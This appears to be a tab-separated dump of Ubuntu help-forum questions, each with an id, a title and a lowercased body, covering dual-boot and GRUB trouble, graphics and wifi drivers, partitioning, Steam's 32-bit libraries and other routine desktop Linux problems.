345727	windows not loading after ubuntu installation ?	at first i have windows7 on my lap on c : drive after then i installed ubuntu ( along side windows ) , then ubuntu not appeared in boot menu , i updated grub then ubuntu coming but windows is not loading it is showing recovery mode , after that i repaired my windows using some commands then windows working properly but ubuntu not appearing in boot options . how can i get both os at a time ... any help . here my paste bin url : http : //paste.ubuntu.com/6106509/
345732	cryptdisks_start does not work any more	on my crypttab i have a line like this : usbdisk1 /dev/disk/by-uuid/76552c4e-aaf0-4d3a-a6a8-994301491e21 none luks , noauto then , if i do this : sudo cryptdisks_start usbdisk1 it just says * usbdisk1 ( starting ) .. hanging there and never asking a password . this has worked before , so i wonder if some recent security update to 12.04 has slightly changed something ? curiously if i mount the partition from kubuntu device notifier widget it is able to mount the partition no problem . i also have an identical backup usb drive , and it behaves exactly the same way . so it seems unlikely that the drive itself is corrupted .
345733	pointer settings	i decided to re-install ( give a second chance ) to ubuntu which had not supported my wifi drivers and had not supported my display drivers between version 12.04 to 9.04 and would not install the drivers even if i installed connected to the net via cat-5e ( ethernet ) connection . i was pleasantly surprised when doing this with the version 13.04 and i think you may have practically won me over and stopped me from having to install windows vista . however it first appeared i was originally i having an issue with start-up time for my inspirion 1545 but it has since stopped thanks to doing updates . that being said i have 1 thing to gripe about in this version ( besides the lack of support , i mean 9 months come on ! ) . for some reason the pointer does not allow me to change my settings at all . it 's not that i ca n't move the slide bars or anything like that , it 's just when i exit the settings they do n't save them and wo n't allow the change i made to occur . my pointer ( currently using the touchpad ) moves way too fast and the double click is way too slow , and i did try changing it as previously stated .
345735	what does this code do if entered in a terminal ?	sudo add-apt-repository ppa : langdalepl/gvfs-mtp sudo apt-get update then , launch software updater ( previously known as update manager ) and install the available updates . after you update everything restart pc . if you want to revert back before making any changes : sudo ppa-purge ppa : langdalepl/gvfs-mtp this was an answer to a question i recieved in the android forums and i do n't want to enter it until i 've got some idea what i 'm doing .
345736	rhythmbox corrupted all the songs on my ipod	i 'm using ubuntu 12.04 . i recently hooked up my iphone to rhythmbox . i pressed `` sync with library '' in the tab in my iphone . it did what i told it to , but now all my songs are trash in my iphone and rhythm box . when i click on a song in my iphone or rhythmbox , i see the album artwork for half a second , and then it continuously skips from song to song , my iphone thinks all the songs are gone , since three gbs are missing , but the songs look like they are in my music app . what happened and how can i reverse this ?
345737	what ubuntu version should install for a toshiba satellite l305d ( 64 kb )	i bought a toshiba satellite l305d-sp6805r , it comes with an ati radeon hd 3100 graphics card , an amd athlon x2 64-bits processor . i’ve tried to install in ubuntu and fedora , but all of them have given me the same problem : the computer reaches 105ºc , the highest temperature allowed by it before shutting itself off to avoid damage . the problem ? the fan is not correctly managed/detected by the kernel , and it can’t be managed by the user either . i found a solution right here : http : //yeiacatl.wordpress.com/2010/09/02/installing-linux-in-a-toshiba-satellite-l305d-with-temperature-problems/ . but they recommended to use ubuntu 9.10 and it is not longer supported . so my laptop is a little old and i wanted to know what distro should i install . thanks .
345742	ca n't open modem config page while in bridge mode	192.168.1.1 does n't open if i configured modem as bridge . i can open it again by reseting modem to default config , but after i save new options , page is inaccessable .
345765	why does the ubuntu installation shows an error on my samsung laptop ?	there is always an error displayed during the ubuntu installation and then it automatically stops after hours of that installation . what do i do ?
345767	why ubuntu mobile apps are from qt ?	why ubuntu recommended ubuntu mobile applications to develop on qt ? actually is it possible to design the ubuntu mobile applications in any other languages like java , perl , python or others ?
345769	how to write two install .iso ( for example windows and linux ) on one flash ?	how to write two installer .iso images ( for example windows and a linux system like ubuntu ) on one usb flash drive ?
345770	is there a way i can make it so i do n't have to type in the network name/select security type when i go to connect to a wireless network ?	it 's slightly inconvenient , really one of the only problems i have with ubuntu . oh , and i 'm running 12.10 .
345773	fast , simple text editor / journaling tool ?	when i have to use windows i use a simple editor called savageed2 that is lightning-fast to open , has auto-save and quick esc exit , and automatically creates timestamped log files . i 've tried running that editor using wine but it is definitely not fast to open in that environment ( though otherwise works wonderfully ) . i want an editor that pops up instantly , automatically timestamps my entries , lets me enter free-form text , and then automatically saves my edits and goes away when i hit the esc key . none of the dozen or so linux editors i 've looked at can be configured to do this -- or can they ? if there is something other than a text editor that can do this , i 'd consider that as well ( as long as it does n't use bizarre key mappings like vi or wordstar ) -- perhaps a pim like the old ms-dos borland sidekick .
345774	ubuntu update for samsung	i have a samsung galaxy note 1 . i want to upgrade my phone from android os to ubuntu but i do not know how to do that .
345776	unity launcher , top panel , dash and title bar disappeared	i have installed ubuntu 13.04 32bit , afer installing ccsm and nvidia drive , unity launcher , top panel , dash and title bar disappeared . now what should i do ?
345779	ubuntu g580 sound problem	i have bought a g580 lenovo laptop , and the sound is not working well , always distorted , i could not find a driver for sound when i searched for it , is there any support for this laptop ?
345782	gui-control to small - liferea and pidgin	`` multi-select '' with hight 0px . i ca n't see the attachment list in liferea . my problem is exactly described over here : http : //sourceforge.net/p/liferea/bugs/987/ i am using liferea 1.8.3 on 12.10 . the problem is still here . this bug also appears in pidgin using the /config command in muc ( please see screenshot ) , so imho this is a general issue in unity/gnome . http : //imageshack.us/photo/my-images/34/cr4t.png/ ( `` maximum number of occupants '' , ... ) any ideas ?
345785	help with running c programs in ubuntu	i 've been teaching myself to write programs in c , using geany as my ide . all of my programs get compiled and linked correctly , and they seem to work fine when i test run them inside of the ide , however i ca n't seem to run to program without the use of the ide . i 've tried using the terminal command ./ [ filename ] however , i always get this response from the terminal : bash : ./variabletest : no such file or directory any idea why this does n't work ? simply clicking on the executable 's icon does n't work either .
345788	laptop cant find my wireless network . function key also not working	acer aspire 5710z sta drivers up to date . please help im going round in circles trying to follow what others have done on slightly different laptops ... this is driving me up the wall and round the corner , to the shop and back again , all while forgetting to buy the milk .
345789	can not create a new partition for my unallocated space	well , i had 4 primary partitions . one is for windows system files ( booting and stuff ) , one is for windows files , one is for my data and one is almost empty but i store some data on as well . i wanted to install ubuntu 13.04 on a partition on itself and stop using wubi as it cause some problems at booting , so i backed up my almost-empty partition , deleted it and started ubuntu installation . this partition is about 222 gb . i wanted to install ubuntu only on 20 gb . so on installation i made a partition for swap files and a partition for the root directory to be installed on . when i finished installation . i could n't create new partition . i can not use my other 180 gb hard disk space and it tells me that i 've reached the maximum number of partitions by now . this is a picture for disks app . i know it must be a logical partition . it still refuses that .
345790	how to install syslinux on ubuntu 13.04 ?	i really searched a lot in google , but i do n't found anything . i want to replace my grub with syslinux . i just installed syslinux with sudo apt-get install syslinux ( alias , it seems it was already installed ) but i do n't know how to set it to be the bootloader . i tried syslinux-install_update -ima just like in archlinux , but it failed . what can i do ? another complementary question : how do i install ubuntu 13.04 with syslinux instead of grub ?
345793	uninstalled deb file shows up on menu	running ubuntu cinnamon 64-bit 13.04 and having an issue i have n't faced before . i recently installed and uninstalled skype using their deb package , but the .deb file keeps popping up on my menu screen when i type in skype . i 've uninstalled it , ran synaptic to remove all packages related to skype , and searched my file system and my home folders to see if the deb file was still lurking about somewhere - nothing . here 's what keeps popping up : http : //imgur.com/kbdk05h it 's a small issue but incredibly annoying . tia !
345794	automate phone calls in ubuntu	i have a mobile broadband usb modem ( huawei e1731 ) and this modem supports phone calls . is there any application in ubuntu which can be used make make calls from my modem ? is there any way to automate the calls i.e , the call should end if the user is busy and should redial . thank you .
345801	curl with ipv6 not working by default	i am trying to curl ipv6 adresses , but without success . if i try lets say : curl https : //google.com i wait for a timeout and get network unreachable if i force ipv4 , everything is fine . curl -4 https : //google.com then again if i force ipv6 , like this : curl -6 https : //google.com i get : curl : ( 7 ) failed to connect to 2800:3f0:4001:806 : :1005 : network is unreachable i suppose it has to do somehow with resolving ipv6 adresses . i saw that on other computers that have a newer version of some linux distro , these requests go fine , so i 'm guessing it has to do something with me using ubuntu 10.10 , where this problem is n't solved . i want to be able to curl normally without using the option : -4 , what do i have to modify to be able to use curl normally with ipv6 adresses ?
345811	how to create two seperated dsl connections and use them for different subnets	first excuse my bad english please . my problem is , that , with my internet provider ( alice dsl ) i have two pppoe connections , one for `` ordinary internet '' and one for voip . my question is how can i create two connections and tell ubuntu to send voip data via the first connection and use the second connection for `` ordinary internet '' ? i do not want to bundle them , and i do not want to make failover i would be glad if someone has a solution to my problem
345815	bash : cd : /sda5 : no such file or directory	i have files in sda5 drive but when i tried to navigate into it , it gives me below error : ~ $ cd /media /media $ cd /sda5 bash : cd : /sda5 : no such file or directory /media $ ls 003c-91e4 2a88a65788a620f5_ 70866f8c866f51a0_ document p 2a88a65788a620f5 70866f8c866f51a0 70866f8c866f51a0__ document_ sus hill i have a file to split ( 10gb in size ) .which is in drive document .
345817	12.04 64-bit desktop - nvidia drivers fail to startx	i 'm getting started with linux for the first time . i 've installed 64 bit ubuntu desktop from the live cd . there have been some issues with booting after installation . but i 've managed to get ubuntu to start , allbeit with a 480 resolution . i used the driver tool in settings to find the nvidia drivers and i 've tried all 3 driver options that appear but after rebooting , i can not startx . http : //i1217.photobucket.com/albums/dd384/mctwist2/ubuntu/20130915_112758_zps45b3f699.jpg i have tried the default nouveau drivers , but terminal tells me that i have broken packages . subsequently booted in recovery mode to fix any broken packages , which it appeared to do . but still wont successfully boot with the nvidia drivers : http : //i1217.photobucket.com/albums/dd384/mctwist2/ubuntu/20130915_113952_zpsd0971dce.jpg i have also tried various nvidia driver installation methods using terminal , but these have returned the same problems . both by going to the root in recovery mode and with cntrl+alt+f1 when at the login screen . i do n't think there 's any way to change the resoultion from 480 4:3 without some kind of driver . i 'm running an hp pavilion with a q8200 core2quad and geforce gt 220 proprietary card . any recommendations ? many thanks , dan
345821	mouse not working in ubuntu 12.04	i 've installed ubuntu on my system and have n't been using mice till now . today i plugged in my usb mouse and it does n't work from computer boot-up . the mouse has no problems working on windows systems , but there is only ubuntu installed on my system . keyboard and touchpad are working fine , but this mouse thing is making me crazy . i 've checked all the solutions on the net so far , nothing changed . any ideas ?
345822	blender does not start after kernel update despite reinstall	hi i recently updated my ubuntu 12.04.3 installation with the new kernel 3.8.0.30 after that blender did not start any more with the message that : /usr/lib/blender/blender : error while loading shared libraries : libavformat.so.55 : can not open shared object file : no such file or directory i downloaded blender from the blender website and unpacked it in a separate directory . there blender did start . purging blender and reinstalling it did not help . please advice
345824	unity super+a as default when pressing start menu	i have one feature that i am trying to tweak in ubuntu 13.04 and it 's been more than a year , without success . whenever i press the super button ( the keyboard button with the windows logo on it ) , i get the equivalent of pressing the unity start menu and i am presented with the first lens screen : home ( which is usually empty ) . if i press super+a i get exactly what i need : direct line to applications lens in unity start menu , where i can see all my apps . i have lost hope , but i figured i should give it one more try : is there a file i can edit in ubuntu that would allow me to switch the default start menu to displaying the applications lens instead of home ? something that would make super+a the default view when pressing the start menu . i dream of a day when i can see all my apps with one single click on the unity start menu . there must be something , a file , somewhere . i disabled all other lens , removed the online search , amazon , everything so now i only have home and applications lens available , with home being the default one , whereas i would love to make applications the default when pressing start menu in unity . thank you !
345826	synching package indexes across identical computers	is it safe to copy the package index files ( which get updated when i run apt-get update ) from one computer to another identical one ? basically , i 've run apt-get update on one of them , and i do n't want to have to run it again from the other computer because i have slow and limited internet . i 've copied the packages in /var/cache/apt/archives from one system to another before , and it worked just fine ; no download was necessary . i 'd like to not have to update the package indexes as well . i believe the index files are at /var/lib/apt/lists/
345828	can i install ubuntu 12.04 desktop on a laptop ?	i have a toshiba satellite pro intel core 2 duo . which ubuntu should i install ?
345831	how can i improve my paxtest results ?	i have apparmor installed , but i am willing to secure my system more , i ran a paxtest and i am not impressed by the results , how can i make my results better and make my linux system kill those stuff ? here are my results : http : //pastebin.com/qfupasaq
345834	gnome-control-panel ( system settings ) window width will not resize less than 800px	in my quest of customizing the ubuntu interface , i have stumbled upon a feature which seems almost impossible to change . the gnome-control-center ( system settings ) window is unresizable . if i rigt-click on the top bar , the resize option is grayed out and the window size is fixed . i have 6 icons per row ( 6 personal , 6 hardware , 6 system ) but there is another empty column which just hangs in there and i would like to find a way to shrink the default width of the main window . after reading countless pages online , all answers boiled down to this solution : * use sudo to open /usr/share/gnome-control-center/ui/shell.ui * replace `` property name= '' resizable '' > false < `` with `` true '' * add line property name= '' width_request '' > 500 ( the full explanation is here : how can i resize the system settings window ? ) save , and.. nothing ! i know this works if i increase the width , so if i say 1000 instead of 500 in width_request , the panel will extend to that width . the resize option is still unavailable , so this settings only help to increase or decrease the width , but once it gets to a certain value , the window will not shrink . it has an empty space , as if there is an invisible column there which must be displayed ( see picture in the bottom link ) . so yes , i can get any width value to gnome-control-center as long as it is bigger than 800px , but no less than that . i would need it to be about 700px , which would accommodate my 6 icons ( categories ) per row , instead of leaving a huge empty space now , as if it would wait for a 7th column to be put in , like it was by default , before i removed some of the icons i did not need . is there a way to decrease the gnome-control-center window width in ubuntu 13.04 to something less than 800px , knowing that any higher values works , but not smaller than that ? see picture here : http : //i.stack.imgur.com/30nbg.png thanks !
345836	after forcefully shut down , it was unable to start	i had to forcefully shutdown my workstation due to a system hang . after sometime , i tried rebooting it & but is not booting . it says ; hdd is not detected . what can i do for this ?
345838	pc error boot at all	my workstations runs on a dual boot . it was working fine until i find an issue . as soon as i 'm directed to the grub screen , where i select ubuntu as usual . now it wont boot but shows a black screen . i tried all possibilities but it returned with no luck . by the way , i 'm using ubuntu 12.0.4 lts . i had to re-install the os when this happened to me at first . this is the second time it happened to me . what can i do to get this issue sorted .
345842	`` onlyshowin '' and `` notshowin '' not being obeyed in openbox session ?	i 'm running an openbox session in lubuntu 13.04 with the same lxpanel as i do in a standard lubuntu session because i prefer that rather than the `` right-click '' menu provided in the openbox session . i notice that lxpanel 's menu lists some applications twice in an openbox session but just once in a lubuntu session . digging a little more , i get the impression it is because the `` onlyshowin '' and `` notshowin '' instructions in certain .desktop files ( in /usr/share/applications ) are being ignored in an openbox session . for example , i have two `` software & updates '' .desktop files : -rw-r -- r -- 1 root root 466 jun 7 00:51 software-properties-gnome.desktop -rw-r -- r -- 1 root root 531 jun 7 00:51 software-properties-gtk.desktop the upper one has onlyshowin=gnome ; and the lower one has notshowin=gnome ; both are visible in an openbox session but only the latter appears , and correctly so , in a lubuntu session . is it because an openbox session is n't a `` desktop environment '' and is not listed in registered onlyshowin environments ? ( it 's not just about gnome . i also have two synaptic package manager .desktop files ; one has onlyshowin=kde ; it is visible in the openbox session but is not seen in the lubuntu session . )
345845	installation error ubuntu 12.04	i am having problems to install ubuntu 12.04 . it just gives some panic error . i was running on 8.04 ( dual boot with xp ) . about a year ago i have tried also but gave up after many attempts . upgrade from 8.04 crashed with a similar error after several hours . i note that also fedora and archlinux encounter installation problems . i can however still reinstall ubuntu 8.04 or run it on test version . i have removed windows xp and can not reinstall ( lost my code ) . so grub also does not come up anymore . only windows wants to continue installation . i will try to attach a photograph , but this site crashes when uploading it with some frame message . i would be grateful for any help . my processors are 2 times intel ( r ) core ( tm ) 2 cpu 6320 @ 1.86 ghz my hdd are : 2 times maxtor 7l320s0 motherboard : ms-7236 version 2.2 2gb internal memory could there be some hw incompatability ? thanks !
345846	how to create an 802.1x eap access point ?	my laptop has intel wifi bgn 1000 wireless card . how do i create a 802.1x eap access point on ubuntu 12.04 ? i already have configured freeradius server on my laptop . can both access point and radius server run simultaneously on same laptop ?
345853	libreoffice - silent crash on 4.1.1.2	just installed ( a few days ago ) the latest update to libreoffice , being version : 4.1.1.2 [ build id : 410m0 ( build:2 ) ] . kubuntu version is raring . source was the lo ppa on launchpad . installed fine with no error msgs . did not have this problem prior to the latest update . not clear whether its a lo packaging problem , a lo problem or a problem on my laptop . i am now getting silent crashes , mainly ( or always ? ) upon trying to `` save as '' lo files ( using kde dialogs ) . typically when trying to select or change a filename . major pita as its hard to save your work before a crash ! is anyone else having the same problem ? thanks andy -- just had another silent crash with a particular file . unfortunately , had not started it in a terminal ( started via kde menus ) . tried to reproduce error , using same file , doing the same procedure ( save as ) , starting lo in a terminal . result : no crash but got the following output in terminal : '' /org/freedesktop/udisks2/drives/hp______dvdram_gt31l_kzmb1575539 '' : property '' drive '' does not exist '' /org/freedesktop/udisks2/drives/wdc_wd7500bpkt_00pk4t0_wd_wxd1a11v3246 '' : property `` drive '' does not exist '' /org/freedesktop/udisks2/drives/wdc_wd7500bpkt_00pk4t0_wd_wxd1a11v3246 '' : property `` devicenumber '' does not exist '' /org/freedesktop/udisks2/drives/wdc_wd7500bpkt_00pk4t0_wd_wxd1a11v3246 '' : property `` device '' does not exist libreoffice ( 8333 ) : could n't create slave : `` unable to create io-slave : klauncher said : unknown protocol ''. '' x error : badmatch ( invalid parameter attributes ) 8 major opcode : 42 ( x_setinputfocus ) resource id : 0x5e02b43 x error : badmatch ( invalid parameter attributes ) 8 major opcode : 42 ( x_setinputfocus ) resource id : 0x5e02b43
345854	how to fix the error while downloading video	when i try to download a video , i get an error : youtube-dl http : //youtu.be/my2frpa3gf8 : [ youtube ] setting language [ youtube ] my2frpa3gf8 : downloading video webpage [ youtube ] my2frpa3gf8 : downloading video info webpage [ youtube ] my2frpa3gf8 : extracting video information [ youtube ] my2frpa3gf8 : encrypted signatures detected . error : unable to download video
345855	no private facebook msgs in gwibber 3.4.2 on 12.04 , twitter and facebook timeline works fine	i tried out gwibber on ubuntu 12.04 with facebook and twitter . twitter works perfectly for me im getting the tweets and also my private messages and they show up under the private tab . for facebook it also updates the messages section but under the private tab im just able to see the twitter messages and nothing from facebook . under the account menu i can see both facebook and twitter accounts , for twitter it says that im authorized by twitter but for facebook theres always the button to authorize , but i can do it as often as i want , nothing changes . but at least its getting the broadcasting feed from facebook , and on facebook.com the app gwibber is also listed . so i guess it should be alright ? i encountered when i start gwibber from console i get the following error messages : ( gwibber:11911 ) : glib-gobject-warning ** : g_object_set_property : object class gwibberaccount ' has no property named `uid' ( gwibber:11911 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ! g_slist_find ( group , radio_button ) ' failed ( gwibber:11911 ) : gtk-critical ** : gtk_widget_show : assertion `gtk_is_widget ( widget ) ' failed ( gwibber:11911 ) : glib-gobject-warning ** : g_object_set_property : object class gwibberaccount ' has no property named `uid' ( gwibber:11911 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ! g_slist_find ( group , radio_button ) ' failed ( gwibber:11911 ) : glib-gobject-warning ** : g_object_set_property : object class gwibberaccount ' has no property named `uid' but it starts as wanted and shows me what me friends are doing . it would be really nice if i can receive my private messages in gwibber . but i dont know what to do and what these errors mean . i read that there is already version 3.6 of gwibber . is it possible to install this on ubuntu 12.04 and if yes , can you explain how and do you think it will change this issue ? and if its not possible can you recommend another tool with which it is possible to receive private messages from twitter and/or facebook directly to the desktop ? best regards and thx alot !
345856	does ubuntu support hp 1320 printer ?	i have an older hp1320 laser printer and had a difficult time getting the drivers to work with my windows computer . does ubuntu come with this driver already built in or will i have to go through the whole process again if i use it ? ?
345857	laptop always suspends when lid is closed	i recently installed ubuntu gnome 13.10 beta1 and my laptop now always suspends when the lid is closed , regardless of whether its on battery power or plugged in . i 've double checked in power settings , tweak tool , dconf and xfce-power-manager ( i have xfce installed along side ) and have tried setting it to 'do nothing ' , 'blank ' and even 'power off ' and yet it still suspends .
345858	laptop is running hot !	i have a sony vpceh15en laptop with ubuntu 12.04 installed . my laptop runs normally in windows but it is running hot in ubuntu . i have installed jupiter and tlp also.jupiter shows that temperature is about 68'c thank you . running top gave the following output : top - 20:13:04 up 2:55 , 3 users , load average : 1.85 , 1.67 , 1.33 tasks : 162 total , 1 running , 161 sleeping , 0 stopped , 0 zombie cpu ( s ) : 17.0 % us , 3.5 % sy , 0.0 % ni , 79.3 % id , 0.2 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 1928868k total , 1596984k used , 331884k free , 45956k buffers swap : 2038780k total , 11172k used , 2027608k free , 732020k cached pid user pr ni virt res shr s % cpu % mem time+ command 18488 sony 20 0 566m 27m 18m s 25 1.4 6:23.45 gnome-system-mo 6568 root 20 0 124m 20m 5580 s 22 1.1 20:07.93 xorg 17462 sony 20 0 1378m 337m 48m s 9 17.9 7:35.35 firefox 6956 sony 20 0 599m 27m 4372 s 7 1.5 6:58.50 conky 7369 sony 20 0 613m 19m 11m s 7 1.0 1:45.87 gnome-terminal 6796 sony 20 0 1888m 151m 37m s 7 8.0 6:36.23 gnome-shell 6774 sony 20 0 934m 19m 13m s 0 1.1 0:06.15 gnome-settings- 6806 sony 20 0 686m 16m 11m s 0 0.9 0:02.69 nm-applet 6829 sony 20 0 828m 22m 11m s 0 1.2 0:08.13 python 8910 root 20 0 22188 3616 840 s 0 0.2 0:37.71 airodump-ng 17457 root 20 0 0 0 0 s 0 0.0 0:02.29 kworker/u:1 1 root 20 0 24592 2288 1288 s 0 0.1 0:00.82 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:03.35 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.03 migration/0 8 root rt 0 0 0 0 s 0 0.0 0:00.07 migration/1 10 root 20 0 0 0 0 s 0 0.0 0:02.91 ksoftirqd/1 lspci | grep vga gave the following output : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
345859	how to set default editor in 13.04 ?	none of this , this nor this worked in setting my default editor . have n't tried this , i 'm afraid it wo n't work either . so how do i set the default editor to emacs or possibly emacsclient in 13.04 through the cli/terminal ? double-clicking on a text file still opens up to gedit . i specifically say 13.04 because i had no problem in doing so in 11.04 from which i recently upgraded from .
345864	after installing ubuntu 13.04 not able to see options for windows 8 and ubuntu at start up	today i installed ubuntu along with windows 8 on my hp laptop using dvd drive ( boot from internal dvd ) . during installation it said something like `` you need to have space of 1 mb or so for booting else also you can install it might give errors later '' issue : now i wont get option when systems boots up it directly goes to windows 8 . i have c drive 320 gb for windows , d as 8 gb for swap , f as 16 gb for /home and 30 gb for windows recovery . please help me , do i need to try boot repair with try ubuntu option that i get when i boot from dvd ? waiting for response . i guess issue is related to mbr , i guess during my installation instead of writing to windows mbr it wrote to f drive ? please help me .
345869	why ca n't i resize partitions ?	i am trying to install windows 7 ( ubuntu installed first ) . i try to resize my partition but everything is greyed out but unmount , info and manage flags . i am also using the partition i am trying to resize . and im not trying to dual boot
345873	gdb crashes with : importerror : no module named libstdcxx.v6.printers	i have a problem with gdb . whenever i try to debug any c++ program , just after running it , gdb gives this error : ( gdb ) run starting program : /home/errikos/workspaces/tests/a.out traceback ( most recent call last ) : file `` /usr/lib/debug/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.18-gdb.py '' , line 59 , in < module > from libstdcxx.v6.printers import register_libstdcxx_printers importerror : no module named libstdcxx.v6.printers traceback ( most recent call last ) : file `` /usr/lib/debug/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.18-gdb.py '' , line 59 , in < module > from libstdcxx.v6.printers import register_libstdcxx_printers importerror : no module named libstdcxx.v6.printers after that , gdb continues running ( ie . does not crash completely ) . i am aware that there are several bug reports about this ( here , here and here ) . in the second report , there is also a claim that there is a fix released . in the third one , there is a symlink workaround , that did not work for me ( and which i do not like , even if it worked ) . has anyone found a workaround for this ? any missing package ? note : i have the ubuntu toolchain test builds ( ppa : ubuntu-toolchain-r/test ) ppa activated .
345878	what does installing ubuntu `` alongside '' windows entail ?	i recently posted a question about an error i was receiving trying to access ubuntu from the boot menu . i am using windows 7 and ubuntu 12.x ( i think because i have n't accessed it in over a year due to being unable to run an important program for one of my classes on ubuntu ) . on another laptop , i partitioned the hard drive and installed windows and ubuntu on the partitions . on this laptop , i simply installed ubuntu from windows , picking the option `` alongside windows '' , and did n't partition my hard drive manually . i was under the impression `` alongside '' entailed that ubuntu would partition my hard drive , and that if i were to return my windows partition to factory settings it would not affect the ubuntu partition . however , given my current problem , i am wondering if i was mistaken in this assumption ? when installing ubuntu from windows , selecting `` alongside '' windows as the option from the ubuntu installer , does that simply install ubuntu within the windows partition and thus returning it to factory settings would wipe out anything i had on the ubuntu os as well ? ubuntu is still in the boot menu as an option , but when i try to access it it says the drive is `` corrupt '' and wubi is mentioned in the error . i additionally tried to download a program ran from windows to investigate partitions and there were no sign of my ubuntu partition viewable from windows . is it possible windows just ca n't see it ? any insight , corrections or answers is appreciated .
345883	what version ? dell inspiron 910 8gb	i 'm new to ubuntu and planning to install it on my dell inspiron 910 , because in windows xp some random updates ate all my 8gb storage ( ssd ) . even after stripping down xp to the bone , i 'm unable to install any of the updates due to no storage space available . therefore , i 've decided to install ubuntu instead . after doing research , i came across various versions of ubuntu . first it was 32bit / 64bit . and then , i found lubuntu , xubuntu , etc . i have tried lubuntu from a live disk which did not help me to connect with wifi ( known problem i assume ) . after some reading i realized , there were different specifications of the ubuntu versions , especially about disk space that each version requires . in my case , it is pretty important . so , given the fact i only have 8gb ssd . which one will be most suitable for me ?
345886	alert when a wifi network is detected ?	is there any way to play a sound to alert me when a wifi ( wireless ) network is detected ?
345889	ubuntu touch sdk - qmake problem	i 've recently tried installing the ubuntu sdk but with no luck ! i followed the developer instructions , and when i launch the qtcreator ubuntu sdk and create anew project i do n't have any options for creating a new touch project . also worth noting that some options on the left are greyed out . i have done my research and followed other answers for this but had no luck . i also seen a bug for it on launchpad and followed their steps . in terminal when i run : which qmake i get : /usr/bin/qmake when i run : qmake -v i get : qmake : could not find a qt installation of '' as detailed in the lauchpad bug report i 've deleted config files and tried adding it manually . if anyone has any ideas or are also having this problem , please let me know . thanks in advanced . also worth noting : i have done the classic `` have you tried turning it off and on again ''
345894	how do i configure terminal using .profile ?	i want to change some configuration of terminal , but i did not find mail , path , ps1 , and ps2 in .profile . please tell me where will i find these , and what i have to do if i want to change ps1 , ps2 and path using the .profile file ?
345896	installing mesa on ubuntu	i have problem with opengl on ubuntu . i need opengl for qt , but qt reports and error `` can not find -lgl '' . but i think i have mesa installed because in folder /usr/lib/i386-linux-gnu , i have a folder called mesa with file libgl.so.1 . why qt cant find it then ? i use 32 bit ubuntu running on virtualbox .
345899	ca n't boot ubuntu 12.04 64x after installation alongside win7	i have installed ubuntu 12.04 64bit version alongside windows 7 64bit from dvd following the instructions on this page . the entire installation went as described and there seemed to be no problems with it . when i restarted i discovered there was no boot menu . i solved the problem as described on this link . after rebooting again i got to the boot menu and chose the ubuntu 12.04 option after which a black screen appeared with text : initializing variable space . starting cmain ( ) ... _ and after that nothing happens except that the dash blinks . it seems that i ca n't provoke any kind of response with enter space or any f keys . here is a detailed report from easybcd if it 's of any help : there are a total of 2 entries listed in the bootloader . default : windows 7 timeout : 10 seconds easybcd boot device : c : \ entry # 1 name : windows 7 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.exe entry # 2 name : ubuntu 12.04 bcd id : { b25a01ae-0cc9-11e3-bbfd-742f68d47a13 } drive : c : \ bootloader path : \nst\autoneogrub0.mbr windows boot manager -- -- -- -- -- -- -- -- -- -- identifier { 9dea862c-5cdd-4e70-acc1-f32b344d4795 } device partition=\device\harddiskvolume1 description windows boot manager locale hr-hr inherit { 7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e } default { e7a07940-8e20-11e1-a7a0-b36feede8885 } resumeobject { e7a0793f-8e20-11e1-a7a0-b36feede8885 } displayorder { e7a07940-8e20-11e1-a7a0-b36feede8885 } { b25a01ae-0cc9-11e3-bbfd-742f68d47a13 } toolsdisplayorder { b2721d73-1db4-4c62-bf78-c548a880142d } timeout 10 windows boot loader -- -- -- -- -- -- -- -- -- - identifier { e7a07940-8e20-11e1-a7a0-b36feede8885 } device partition=c : path \windows\system32\winload.exe description windows 7 locale hr-hr inherit { 6efb52bf-1766-41db-a6b3-0ee5eff72bd7 } recoverysequence { e7a07941-8e20-11e1-a7a0-b36feede8885 } recoveryenabled yes osdevice partition=c : systemroot \windows resumeobject { e7a0793f-8e20-11e1-a7a0-b36feede8885 } nx optin real-mode boot sector -- -- -- -- -- -- -- -- -- -- - identifier { b25a01ae-0cc9-11e3-bbfd-742f68d47a13 } device partition=c : path \nst\autoneogrub0.mbr description ubuntu 12.04 any kind of help is appreciated .
345900	thepiratebay lense not removing from unity	i ca n't seem to remove this lense . i installed it using this : sudo add-apt-repository ppa : scopes-packagers/ppa sudo apt-get update & & sudo apt-get install unity-scope-piratebay python-lxml i tried removing it using this : sudo apt-get purge unity-scope-piratebay python-lxml it looked like it all worked in the terminal , so i logged out , then back in , and the lense is still in the dash . how do i get rid of it ? edit : it should also be mentioned that i 'm using 13.04
345901	ubuntu 12.04 - steam not running	i 've been using steam on linux for quite a while now and never had any problems . recently though , in the past few days , steam seems not to start anymore- or at least , i ca n't see it running and i ca n't access any of my games . i tried reinstalling it , but to no avail . if i try to run `` steam '' in terminal , this is what i get : running steam on ubuntu 12.04 64-bit steam_runtime is enabled automatically and then nothing happens . if i try opening it with steam_runtime=0 steam , i get : running steam on ubuntu 12.04 64-bit steam_runtime is disabled by the user error : you are missing the following 32-bit libraries , and steam may not run : libpangoft2-1.0.so.0 libpango-1.0.so.0 libgtk-x11-2.0.so.0 libgtk-x11-2.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libgdk_pixbuf-2.0.so.0 libcairo.so.2 libpango-1.0.so.0 libnss3.so libnssutil3.so libsmime3.so libplc4.so libnspr4.so so i 'm quite at a loss as to what has happened here . i have n't changed anything in my configuration , and i 'm not even sure where to find such libraries . what can i do , since a removal and a reinstall did n't work ? small update : i tried opening playonlinux ( my wow installation stopped working now too ) , and i received an error message that basically said i no longer had any 32bit libraries and that my games could not run properly . so now the question is- how do i get them back ? : ) second update : i tried reinstalling the ia32-libs , and this is the outcome : sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . so then i tried running sudo 